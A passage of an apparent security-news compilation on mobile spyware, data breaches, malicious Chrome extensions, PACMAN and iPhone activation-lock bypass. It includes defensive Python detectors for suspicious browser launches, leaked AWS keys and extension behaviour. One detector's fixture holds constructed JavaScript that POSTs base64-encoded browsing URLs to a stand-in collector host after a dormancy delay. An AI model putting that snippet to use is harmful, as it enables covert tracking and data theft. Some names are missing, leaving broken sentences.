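# Constructed process-creation events in the shape a Sysmon/EDR feed might give
# (invented samples, not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --app=https://intranet.example.internal/portal'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --app="https://login-microsoft.example.test/signin"'},
    {"image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "command_line": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app=http://203.0.113.10/login'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.example.com'},
]

CHROMIUM_BINARIES = {"chrome.exe", "msedge.exe", "brave.exe"}
# --app=URL may be quoted or bare on the command line
APP_FLAG = re.compile(r'--app=(?:"([^"]*)"|(\S+))')


def extract_app_url(command_line):
    """Return the URL passed to --app=, or None if the browser was not started in app mode."""
    m = APP_FLAG.search(command_line)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def assess_launch(event, allowed_hosts, trusted_parents):
    """Score one event; returns None when it is not a Chromium app-mode launch."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in CHROMIUM_BINARIES:
        return None
    url = extract_app_url(event["command_line"])
    if url is None:
        return None
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if host not in allowed_hosts:
        reasons.append("app-mode host not in allowlist")
    if parsed.scheme != "https":
        reasons.append("non-HTTPS app-mode URL")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        reasons.append("IP-literal host")
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent not in trusted_parents:
        # a shortcut double-clicked by the user is launched by explorer.exe;
        # a browser spawned by an unknown binary deserves a look
        reasons.append(f"unexpected parent process {parent}")
    return {"image": image, "url": url, "host": host, "reasons": reasons}


def find_suspicious_app_launches(events, allowed_hosts, trusted_parents=frozenset({"explorer.exe"})):
    """Return only the app-mode launches that raised at least one reason."""
    findings = []
    for ev in events:
        a = assess_launch(ev, allowed_hosts, trusted_parents)
        if a and a["reasons"]:
            findings.append(a)
    return findings


if __name__ == "__main__":
    for f in find_suspicious_app_launches(SAMPLE_EVENTS, {"intranet.example.internal"}):
        print(f["url"], "->", "; ".join(f["reasons"]))
```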

Meanwhile, Google is discontinuing support for Chrome apps in favor of Progressive Web Apps (PWAs) and web-standard technologies, and the feature is likely to be completely phased out in Chrome 109 or later on Windows, macOS, and Linux. 

"The --app feature was deprecated before this research was published, and we are taking its potential for abuse into account as we consider its future. Users should be aware that running any file provided by an attacker is dangerous. Google's Safe Browsing helps protect against unsafe files and websites,” Google stated.

“While Safe Browsing is enabled by default in Chrome, users may want to enable Enhanced protection, which inspects the safety of your downloads to better warn you when a file may be dangerous. Enhanced protection can be found in Chrome Settings > Privacy and security > Security. We encourage the security research community to continue to report issues and vulnerabilities through our vulnerability rewards program:”

Iranian Hackers Employ Novel RatMilad Spyware to Target Enterprise Android Users


Earlier this week, threat analysts at mobile security firm Zimperium Inc. zLabs detailed a newly unearthed form of Android spyware leveraged to target enterprise devices in the Middle East. 

Dubbed “RatMilad,” the original version of the spyware was found hiding behind a VPN and phone number spoofing app called Text Me. After discovering the spyware, the researchers also spotted a live sample of the malware family distributed through NumRent, an updated version of Text Me.

According to Zimperium, an Iran-based hacker group named AppMilad is distributing the phone spoofing app via links on social media and communication tools like Telegram, luring unsuspecting users into sideloading the app and granting it extensive permissions. Moreover, fraudsters have designed a product website to distribute the app and trick users into believing that it is an authentic app. 

Since the malicious app can trick users into granting a broad range of permissions, it can gain access to sensitive device data, such as location and MAC address, and user data, including phone calls, contact numbers, media files, and SMS messages. 

"Once installed and in control, the attackers could access the camera to take pictures, record video, and audio, get precise GPS locations, view pictures from the device, and more," Zimperium researcher Nipun Gupta stated.

Additionally, the hackers can access the camera and microphone of the device, which allows them to record audio/video and capture photos. Other features include collecting clipboard data, SIM information, and performing read/write activities. 

The scale of the infections is unknown, but the cybersecurity firm said it identified the spyware during a failed compromise attempt on a user's enterprise device. A post published on a Telegram channel used to distribute the malware sample has been viewed over 4,700 times with more than 200 external shares, indicating limited reach.

"The RatMilad spyware and the Iranian-based hacker group AppMilad represent a changing environment impacting mobile device security," Richard Melick, director of mobile threat intelligence at Zimperium, explained. From Pegasus to PhoneSpy, there is a growing mobile spyware market available through legitimate and illegitimate sources, and RatMilad is just one in the mix." 

Prevention tips 

The easiest method to avoid falling victim to fake Android apps employed to propagate spyware and malware is to download new apps from official app stores like the Google Play Store, the Amazon Appstore, and the Samsung Galaxy Store. 

Additionally, users are advised to scan any app that is sideloaded onto a device, since sideloaded apps increase the mobile attack surface and leave data and users at risk.

Thousands of Users Impacted in Revolut Data Breach


Financial technology firm Revolut has suffered a massive data breach that may have allowed hackers to access the private details of over 50,000 users. 

The fintech giant, which has a banking license in Lithuania, described the assault as “highly targeted” and stated the hacker only had access to 0.16% of customers’ data for a “short period” of time. 

“We immediately identified and isolated the attack to effectively limit its impact and have contacted those customers affected. Customers who have not received an email have not been impacted,” Revolut spokesperson Michael Bodansky explained. “To be clear, no funds have been accessed or stolen. Our customers’ money is safe – as it has always been. All customers can continue to use their cards and accounts as normal.”  

However, according to Revolut’s breach disclosure to the authorities in Lithuania, the firm says nearly 50,150 global customers, including 20,687 in the European Economic Area (EEA) and 379 Lithuanian citizens, may have been impacted by the data breach. The leaked data includes names, postal and email addresses, telephone numbers, partial card details, and bank account information.  

Soon after the attack, multiple Revolut users complained regarding obscene texts received via the application’s chat feature. Some customers also reported getting text messages directed to a Revolut phishing website. It’s unclear if these events are related to the breach. 

In its data breach notification to affected users, Revolut warned impacted users to be on high alert for follow-on phishing and fraud scams using leaked details. 

“Cyber-criminals are constantly looking for ways to make money at your expense and try to exploit human emotions in order to extract the information they need directly from you using social engineering techniques. Scammers usually follow the same principle – they try to force you to take actions without thinking about them after starting an emotional conversation,” the company warned users. 

“Malicious persons and fraudsters may try, using the publicized information about this breach of personal data security, to trick you with various login or other important personal data, offer some fictitious services and ask you to pay for them.” 

According to Forbes, London-based Revolut is the UK’s most valuable fintech startup, currently valued at $33 billion. It has over 20 million customers in 200 nations but is most popular in Europe and the UK. The app-based bank was established in 2015 by Russia-born Nikolay Storonsky and Ukraine-born Vlad Yatsenko.

Japanese Payment System Attacked By Fake Security App

A new piece of malware has been observed by the research team at McAfee Corp. It was found attacking NTT DOCOMO customers in Japan. 

The malware, distributed via the Google Play Store, pretends to be a legitimate mobile security app, but in reality it is fraud malware designed to steal passwords and to abuse a reverse proxy, targeting NTT DOCOMO mobile service customers. 

The McAfee Mobile Research team reported the malware to Google. In response, Google removed the application from the Google Play Store and deleted known Google Drive files associated with the malware. In addition, Google Play Protect has now alerted affected users by disabling the apps and displaying a warning. 

The attackers publish fake apps on the Google Play Store under various developer accounts, made to look like legitimate apps. According to a tweet by Yusuke Osumi, a Security Researcher at Yahoo, the attacker lures victims into installing the malware by sending them an SMS message with a Google Play Store link, reportedly sent from overseas. The message entices users by claiming that their security software needs to be updated. 

This way, the victim unknowingly installs the fraudulent app from the Google Play Store and ends up installing the malware. The malware asks the user for their network password but, cleverly, claims the password is incorrect, prompting the user to enter it again more carefully. It does not matter whether the password was actually incorrect, as this network password can later be used by the attacker for NTT DOCOMO payment services, opening the way to fraudulent purchases. 

Thereafter, the malware displays a fake ‘Mobile Security’ screen on the user’s device; interestingly, the layout of this screen resembles an outdated version of the McAfee Mobile Security interface. 

How does the malware function?

A native library called ‘’, written in Go, is loaded when the app starts. Once loaded, it attempts to connect to its C&C servers over a WebSocket, and WAMP (Web Application Messaging Protocol) is then used to communicate and issue Remote Procedure Calls (RPC). Once the connection is established, the malware transmits the network information and the victim’s phone number and registers the client’s RPC commands; it then acts as an agent, processing each command as it is received from the server. The same socket is used to transmit the victim’s network password to the attacker when the victim enters it.

The attacker makes fraudulent purchases using this leaked information. To do so, the RPC command ‘toggle_wifi’ switches the victim’s Wi-Fi connection status, and ‘connect_to’ provides the attacker with a reverse proxy, which allows connections to a host behind Network Address Translation (NAT) or a firewall. Through this proxy, the attacker can send requests via the victim’s mobile network. 

Beyond any other methods the attackers may use, the malware can also use the reverse proxy to acquire the user’s mobile and network information and run an agent service over WAMP for fraudulent purposes. Mobile security organizations therefore always advise caution when entering a password or confidential information into a lesser-known or suspicious application.

US Law Enforcement Agencies Employ Obscure Phone Tech to Track People Movements


Multiple law enforcement agencies in Southern California and North Carolina are employing a powerful but relatively inexpensive cellphone tool dubbed ‘Fog Reveal’ to track individual devices without a warrant, based on data collected from apps installed on citizens’ smartphones. 

According to a detailed report published by the Associated Press based on documents obtained by the Electronic Frontier Foundation (EFF), the tool gave US police the ability to scan billions of records from 250 million mobile devices and harness the resulting data to create “patterns of life” for each individual, including home and workplace locations. 

Fog Reveal was designed by Virginia-based Fog Data Science and is reportedly used extensively by law enforcement agencies in the US to solve criminal cases. 

According to AP, the company aggregated the collected data into a searchable form and designed software able to sift through it in sophisticated ways. It then sold the software under about 40 contracts to nearly 20 agencies, with prices starting at $7,500 a year. 

The technology is controversial as US courts are still weighing the use of location data, and the latest such ruling from the US Supreme Court held that law enforcement agencies would require a warrant in most cases to access records of users’ movements and location. 

Additionally, mobile geolocation data of individuals should only be requested from Google (Android devices) or Apple (iPhones and iPads) by police forces in possession of a warrant released by a court.

The Virginia-based firm defended its product by arguing that its data is anonymized, with the company having no way of linking signals back to a specific device or owner. At the same time, some of the documents obtained by AP suggest police forces may be able to deanonymize the data to identify and locate specific individuals. 

The AP investigation primarily relied on public records (including GovSpend and Freedom of Information Act requests) and internal emails obtained by the local news outlet. The report comes days after the US military and intelligence agencies revealed a new monitoring operation to guard electoral procedures from hacking and fake news before and during the November midterm elections.

Over 1800 Mobile Apps Found Exposing AWS Credentials

Experts find hard-coded AWS credentials

Experts have found 1,859 applications across Android and iOS that contain hard-coded Amazon Web Services (AWS) credentials, posing a major security threat. More than 77% of the apps contain valid AWS access tokens that allow access to private AWS cloud services. 

Mobile apps may contain vulnerabilities in the supply chain that can potentially cause exposure to sensitive data, which can be used by hackers for other attacks. Supply chain vulnerabilities in mobile apps are often added by app developers, intentionally or unintentionally. 

Developers are often unaware of the security impact, putting the privacy of app users, as well as that of their employers and organizations, at risk. 

Source of the Problem

Researchers at Broadcom Software looked into why and where exactly the AWS access tokens were inside the applications, and whether the same tokens were present in other apps too. They found that over half (53%) of the apps were using the same AWS access tokens found in other apps. 

These apps, interestingly, came from different app developers and organizations. This pointed to a supply chain vulnerability: the shared tokens could be traced to a shared library, third-party SDK, or other shared component used in building the apps. 

Why are app developers using hard-coded access keys?

  • Downloading or uploading assets and resources needed for the applications, generally large media files, images, or recordings. 
  • To access configuration files for the app and/or register the device or get device info for cloud storage. 
  • Access cloud services that need authentication, like translation services.
  • For no particular reason: dead code that was used for testing and never removed. 

In one incident discovered by Symantec, an unknown B2B company that offers an intranet and communication platform and also provides a mobile software development kit (SDK) to its customers had its cloud infrastructure keys embedded in the SDK to access the translation service. 

This led to the exposure of all of its customers' personal information, corporate data, and financial records belonging to more than 15,000 medium to large-sized firms. 

How can users stay safe from supply chain attacks?

It is possible to protect yourself from supply chain issues: add security scanning solutions to the app development lifecycle, and, if you use an outsourced provider, review Mobile App Report Cards, which can flag malicious behaviors or vulnerabilities for every release of the mobile app. All of these help to highlight potential issues. 

If you're an app developer, you can look for a report card that both scans SDKs and frameworks in your apps and finds the source of any vulnerabilities or suspicious behaviors. 
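As an added example of the kind of scanning the report recommends (my own code, not Symantec's tooling), this Python scanner pulls printable strings out of constructed binary blobs, looks for AWS access key IDs in the AKIA/ASIA shape with an adjacent 40-character secret candidate, and then clusters the keys across apps, mirroring the finding that the same token turning up in several unrelated apps points to a shared SDK. The app names, blob contents and key values are invented placeholders.

```python
import re
from collections import defaultdict

# Constructed stand-ins for the string tables of several app binaries. The key IDs
# are invented placeholders in the AKIA shape, not real credentials.
SAMPLE_APPS = {
    "com.example.shopping": (
        b"\x00\x01libtranslate\x00"
        b"AKIAEXAMPLEKEY000001\x00"
        b"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\x00"   # AWS documentation example secret
        b"https://s3.amazonaws.com/example-bucket\x00"
    ),
    "com.example.news": (
        b"\x7fELF\x00\x00"
        b"AKIAEXAMPLEKEY000001\x00"     # same key as the shopping app: shared SDK?
        b"unrelated string here\x00"
    ),
    "com.example.fitness": (
        b"AKIAEXAMPLEKEY000002\x00"
        b"debug build only\x00"
    ),
    "com.example.clean": b"no credentials in this binary\x00",
}

# Access key IDs are 20 characters: a 4-letter prefix plus 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Secret access keys are 40 characters from the base64-like alphabet.
SECRET_CANDIDATE_RE = re.compile(r"^[A-Za-z0-9/+=]{40}$")
MIN_STRING_LEN = 8


def extract_strings(blob, min_len=MIN_STRING_LEN):
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_aws_keys(blob):
    """Return access key IDs found in blob, each with any secret candidate stored next to it."""
    strings = extract_strings(blob)
    hits = []
    for i, s in enumerate(strings):
        for m in ACCESS_KEY_RE.finditer(s):
            # a hard-coded secret usually sits within a string or two of its key ID
            neighbours = strings[max(0, i - 1):i + 2]
            secret = next((n for n in neighbours if SECRET_CANDIDATE_RE.match(n)), None)
            hits.append({"access_key_id": m.group(), "secret_candidate": secret})
    return hits


def cluster_by_key(apps):
    """Map each access key ID to the set of apps embedding it."""
    owners = defaultdict(set)
    for app_id, blob in apps.items():
        for hit in find_aws_keys(blob):
            owners[hit["access_key_id"]].add(app_id)
    return dict(owners)


def shared_keys(apps):
    """Keys present in more than one app: a sign of a shared library or SDK in the supply chain."""
    return {k: sorted(v) for k, v in cluster_by_key(apps).items() if len(v) > 1}


if __name__ == "__main__":
    for app_id, blob in SAMPLE_APPS.items():
        print(app_id, find_aws_keys(blob))
    print("shared across apps:", shared_keys(SAMPLE_APPS))
```

A real scan would feed it the strings of each APK's DEX and native libraries, and any live hit should be revoked in IAM before anything else.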

Malicious Chrome Extensions Siphoning Data from 1.4 million Users


Threat analysts at McAfee unearthed five malicious Chrome extensions designed to track users' browsing activity and inject code into e-commerce websites. 

With over 1.4 million installs, the malicious extensions can alter cookies on e-commerce platforms without the victim’s knowledge so that scammers can receive affiliate payments for the purchased products. The five malicious extensions that exploit affiliate marketing are as follows: 

• Netflix Party (800,000 downloads), 
• Netflix Party 2 (300,000), 
• Full Page Screenshot Capture (200,000), 
• FlipShope Price Tracker Extension (80,000), 
• AutoBuy Flash Sales (20,000). 

"The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website," McAfee researchers Oliver Devane and Vallabh Chole explained. "The latter borrows several phrases from another popular extension called GoFullPage."

All five extensions employ an identical methodology to target users. The web app manifest ("manifest.json" file), responsible for managing the extension's behavior on the victim’s system, loads a multifunctional script (B0.js) that sends the browsing data to a domain the hackers control (“langhort[.]com”). 

The data is sent via POST requests each time the victim visits a new URL. The stolen data includes the URL in base64 form, the user ID, device location (country, city, zip code), and an encoded referral URL. The researchers also disclosed that the user tracking and code injection behavior resides in a script named ‘b0.js’, which contains many other functions as well. 

Additionally, the security firm identified an evasion mechanism that delays the malicious activity by 15 days from the time the extension is installed, to help keep its activity concealed and avoid raising red flags. 

McAfee recommends users extensively check extensions before installing them, even if they already have a large install base, and to pay close attention to the permissions the extensions ask for, such as the permission to run on any website the user visits. 
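To show what "paying close attention to the permissions" can look like in practice, here is an added Python audit (my own example, not McAfee's tooling) that reads an extension's manifest.json and flags broad host access, sensitive permissions and background scripts, plus heuristics over a script body for the pattern described above: base64-encoded URLs POSTed to a hard-coded host after an install delay. The manifest, script text and collector hostname are constructed for the example.

```python
import json
import re

# Constructed manifest and script modelled on the behaviour described in the post;
# the file contents and the domain are invented, not the real extensions' code.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Example Party Extension",
    "version": "1.0.3",
    "permissions": ["tabs", "cookies", "storage", "<all_urls>"],
    "background": {"scripts": ["B0.js"], "persistent": True},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
})

SAMPLE_SCRIPT = r"""
const installed = Date.now();
chrome.tabs.onUpdated.addListener((id, info, tab) => {
  if (Date.now() - installed < 15 * 24 * 60 * 60 * 1000) return;   // sleep after install
  const payload = { url: btoa(tab.url), ref: btoa(document.referrer) };
  fetch("https://collector.example.test/report", { method: "POST", body: JSON.stringify(payload) });
});
"""

# Host patterns that let an extension act on every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that allow reading or rewriting what the user sees and sends.
SENSITIVE_PERMS = {"cookies", "webRequest", "webRequestBlocking", "tabs", "history"}


def audit_manifest(manifest_text):
    """Return human-readable findings for a manifest.json (Manifest V2 or V3 keys)."""
    m = json.loads(manifest_text)
    findings = []
    perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    if perms & BROAD_HOSTS:
        findings.append("can run on every site the user visits")
    for p in sorted(perms & SENSITIVE_PERMS):
        findings.append(f"sensitive permission: {p}")
    for cs in m.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append(f"content script injected on all URLs: {', '.join(cs.get('js', []))}")
    bg = m.get("background", {})
    scripts = bg.get("scripts", []) + ([bg["service_worker"]] if "service_worker" in bg else [])
    for script in scripts:
        findings.append(f"background script to review: {script}")
    return findings


def audit_script(script_text):
    """Heuristics for the tracking pattern: encoded data POSTed to a fixed host, gated by a delay."""
    findings = []
    hosts = set(re.findall(r"https?://([a-z0-9.-]+)", script_text, re.I))
    if "btoa(" in script_text and re.search(r"method:\s*['\"]POST['\"]", script_text):
        findings.append("base64-encodes data and POSTs it")
    for h in sorted(hosts):
        findings.append(f"hard-coded remote host: {h}")
    # "Date.now() - x < N * 24 * 60 * 60 * 1000" is an N-day dormancy check
    delay = re.search(r"Date\.now\(\)\s*-\s*\w+\s*<\s*(\d+)\s*\*\s*24\s*\*\s*60\s*\*\s*60\s*\*\s*1000",
                      script_text)
    if delay:
        findings.append(f"activity delayed {delay.group(1)} days after install")
    return findings


if __name__ == "__main__":
    print("\n".join(audit_manifest(SAMPLE_MANIFEST)))
    print("\n".join(audit_script(SAMPLE_SCRIPT)))
```

Unpack an installed extension from the browser's profile directory (or the .crx) and point both functions at its files; the heuristics are deliberately simple and are a starting point for review, not a verdict.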

Last month, security researchers at Kaspersky estimated that more than 1.3 million users have been impacted by malicious browser extensions in just the first six months of this year alone. In fact, from January 2020 to June 2022, researchers unearthed that more than 4.3 million users had adware concealed in their browser extensions. Although Google is working rigorously to eliminate malicious extensions, new ones continue to pop up at a rapid pace.

Google Removes Several Apps From Play Store Distributing Malware


Earlier this week, Google blocked dozens of malicious Android apps from the official Play Store that were propagating Joker, Facestealer, and Coper malware families via the virtual marketplace. 

According to the findings from Zscaler ThreatLabz and Pradeo researchers, the Joker spyware exfiltrated SMS messages, contact lists, and device information and lured victims to sign up for premium service subscriptions. 

A total of 54 Joker downloader apps were unearthed by the two cybersecurity firms, with the apps installed cumulatively over 330,000 times. Nearly half of the apps belonged to the communication category (47.1%), followed by tools (39.2%), personalization (5.9%), health, and photography. 

“The tools and communication were among the most targeted categories covering the majority of the Joker-infected apps. ThreatLabz discovered daily uploads of apps containing the Joker malware indicating the high activity level and persistence of the adversary group.” reads the blog post published by Zscaler. “Consistent with previous findings, ThreatLabz's latest discoveries belonging to the Joker malware campaign continue to follow similar developer naming patterns and use of familiar techniques.” 

ThreatLabz experts also uncovered multiple apps compromised with the Facestealer and Coper malware. 

The Facestealer spyware was first unearthed in July last year by Dr. Web researchers, and was designed to steal Facebook users’ logins and passwords and authentication tokens. 

The Coper malware is a banking trojan that targets banking applications in Europe, Australia, and South America. The hackers distribute the apps by disguising them as legitimate apps in the Google Play Store. 

“Once downloaded, this app unleashes the Coper malware infection which is capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overlay attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on the infected device via remote connection with a C2 server.” continues the report. 

The researchers recommended that users refrain from granting unnecessary permissions to apps and verify their authenticity by checking developer information, reading reviews, and scrutinizing their privacy policies. If you become a victim of a malicious app from the Play Store, inform Google about it immediately through the support options in your Play Store app.

Security Bug Detected in Apple M1 Processor Chipsets


MIT researchers have unearthed an “unpatchable” hardware bug in Apple's M1 processor chipsets that could allow hackers to breach its last line of security defenses. 

The security loophole lies in a hardware-level security mechanism used in Apple M1 chips called pointer authentication codes, or PAC. This mechanism makes it harder for an attacker to inject malicious code into a device’s memory, and it also shields against buffer overflow exploits, a form of attack that forces memory to leak into other locations of the chip; it acts as the last line of defense.

Using an attack to demonstrate the vulnerability 

MIT researchers demonstrated a novel hardware attack dubbed PACMAN that combines memory corruption and speculative execution to bypass the security feature. The attack showed that pointer authentication can be breached without leaving a trace, and because it exploits a hardware mechanism, it cannot be patched with software. 

The attack works by “guessing” a pointer authentication code (PAC), a cryptographic signature that confirms that an app hasn’t been maliciously altered. This is done using speculative execution, a technique modern processors use to improve performance by speculatively running ahead along likely paths of computation, to leak PAC verification results, while a hardware side channel reveals whether or not the guess was correct.

According to the researchers, there are many possible values of a PAC, but with a device that reveals whether a guess is correct or false, one can try them all until they hit the right one. 
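To make the mechanism concrete, here is an added toy model in Python (not Apple's design and not the paper's code) of how a pointer authentication code is computed from the pointer plus a context value, stored in the unused high bits of the pointer, and checked before use; the 48-bit address width, 16-bit PAC width, HMAC construction, key and addresses are all assumptions.

```python
import hashlib
import hmac

# Assumed layout: a 48-bit virtual address leaves the top 16 bits of a 64-bit
# pointer unused, and that is where this model keeps the PAC.
ADDR_BITS = 48
PAC_BITS = 16
ADDR_MASK = (1 << ADDR_BITS) - 1
PAC_MASK = ((1 << PAC_BITS) - 1) << ADDR_BITS


def compute_pac(key, ptr, context):
    """Truncated MAC over (address, context). Hardware uses a per-process key and a dedicated cipher;
    HMAC-SHA256 stands in for it here."""
    msg = (ptr & ADDR_MASK).to_bytes(8, "little") + (context & ((1 << 64) - 1)).to_bytes(8, "little")
    tag = hmac.new(key, msg, hashlib.sha256).digest()
    return int.from_bytes(tag[:8], "little") & ((1 << PAC_BITS) - 1)


def sign_pointer(key, ptr, context):
    """Analogue of the PAC* instructions: place the PAC in the unused high bits."""
    return (ptr & ADDR_MASK) | (compute_pac(key, ptr, context) << ADDR_BITS)


def authenticate_pointer(key, signed_ptr, context):
    """Analogue of the AUT* instructions: recompute and compare. A mismatch is a fault,
    which is why a blind guess at the PAC normally crashes the process."""
    raw = signed_ptr & ADDR_MASK
    if (signed_ptr & PAC_MASK) >> ADDR_BITS != compute_pac(key, raw, context):
        raise ValueError("pointer authentication failed")
    return raw


def corrupt_low_bits(signed_ptr, new_target):
    """Simulates a memory-corruption bug overwriting the address but not the PAC bits."""
    return (signed_ptr & PAC_MASK) | (new_target & ADDR_MASK)


def demo():
    key = b"\x00" * 16                      # constructed key; real keys are secret and per-process
    ret_addr = 0x0000_0001_0000_4F20        # constructed return address
    sp = 0x0000_0001_6FDF_F8A0              # stack pointer used as the signing context
    signed = sign_pointer(key, ret_addr, sp)
    assert authenticate_pointer(key, signed, sp) == ret_addr
    forged = corrupt_low_bits(signed, 0x0000_0001_0000_5000)
    try:
        authenticate_pointer(key, forged, sp)
        return "undetected"                 # only possible if the stale PAC happens to match
    except ValueError:
        return "tampering detected"


if __name__ == "__main__":
    print(demo(), "-", 1 << PAC_BITS, "possible PAC values in this model")
```

In this model every wrong guess raises, so an attacker cannot enumerate the 2^16 values quietly; the PACMAN observation is that a processor which computes the verification result under speculation leaks that same yes/no answer through a side channel without the fault, which is exactly why the mitigation listed below is to never produce PAC verification results speculatively.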

“The idea behind pointer authentication is that if all else has failed, you still can rely on it to prevent attackers from gaining control of your system. We’ve shown that pointer authentication as a last line of defense isn’t as absolute as we once thought it was,” explained Joseph Ravichandran, an MIT CSAIL Ph.D. student and co-lead author of the paper. 

“When pointer authentication was introduced, a whole category of bugs suddenly became a lot harder to use for attacks. With PACMAN making these bugs more serious, the overall attack surface could be a lot larger”. 

Multiple chipsets are in danger 

Apple uses PAC on all its M1 chips, including the M1, M1 Pro, and M1 Max. In the coming months, other chip designers, including Samsung along with Qualcomm, are expected to launch new chips supporting PAC. 

If this exploit is not mitigated, it will impact the majority of mobile devices, and likely even desktop devices in the coming years, researchers warned. 

Prevention tips 

To mitigate the risks, the software must be modified so that PAC verification results are never produced under speculation, meaning an attacker could no longer test guesses without being noticed. 

The second technique is to guard against PACMAN in the same way Spectre vulnerabilities are being mitigated. And finally, patching memory corruption bugs would ensure this last line of defense isn’t required.

Attackers Use Underground Hacking Forum to Strip Activation Lock from iPhones


An underground hacking forum is offering users a convenient way to strip ‘activation lock’ from iPhones with its pay-for-hacking service. However, iOS security analysts believe the hackers are tricking people into removing protections from stolen iPhones. 

Activation Lock essentially prohibits anyone from activating the device until the owner enters the requested credentials. The lock is enabled when the owner sets up Find My, the Apple service that allows people to track the location of their iPhone, Mac, or Apple Watch. 

“Activation Lock,” a text popup across the iPhone’s screen read. “This iPhone is linked to an Apple ID. Enter the Apple ID and password that were used to set up this iPhone.” 

The hackers are using checkra1n, an open-source jailbreaking tool published in 2019. Checkra1n employs an exploit called checkm8 designed by the developer known as Axi0mX. According to’s website, Checkm8 is only applicable for devices running iOS versions 12 to 14.8.1 because the latest iPhones have updated bootrom code that is not susceptible to checkm8. 

A video posted on’s website shows how smooth the process of using the tool is. A user only needs to download the software, install it, open it up, and plug the phone into a Mac or PC. The site charges $69.99 per license. 

“Done! You have successfully bypassed the iCloud activation lock on your device,” the video’s female narrator explains. 

Additionally, provides a service called “Bypass iPhone Passcode.” This service is not the same as established iPhone unlocking services such as Cellebrite and GrayShift. “This service restores the device to factory settings and activates it as a new device using a saved activation ticket from the system. So basically, this method has nothing to do with brute-forcing or user data leak. Passcode phrase is a common name used by other tools for this service so we decided to give it the same name,” the administrator explained. 

Three years ago, in 2019, security researcher axi0mX uncovered checkm8, an exploit that enabled the jailbreak of millions of iOS devices. The exploit lay in the bootrom of the affected devices. Before 2019, the last iOS bootrom-based jailbreak had been published back in 2009, making the checkm8 exploit an even more astonishing feat, since many believed the hardware avenue for rooting devices had long been closed.